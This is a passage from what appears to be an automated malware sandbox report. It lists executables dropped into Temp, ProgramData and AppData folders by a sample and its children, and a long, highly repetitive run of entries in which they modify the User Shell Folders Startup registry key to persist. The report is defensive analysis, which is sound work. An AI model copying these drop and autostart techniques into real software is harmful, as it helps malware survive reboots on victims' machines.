                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeFile created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exeJump to dropped file
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\AppData\Local\Temp\gtxkvh.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeFile created: C:\Users\user\AppData\Roaming\EOcU1eIO\NvT1HrT7\PNkb0PCV\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\Users\user\AppData\Roaming\zRu1BqA0\k45TZ53Y\Caz9ZOq9\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeFile created: C:\Users\user\AppData\Roaming\Soso0bnK\laHUjL9Z\wIjJoUTg\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\Users\user\AppData\Roaming\4pgKLvyS\3OrNf9Ry\jVB94owI\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeJump to dropped file

                            Boot Survival

                            barindex
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
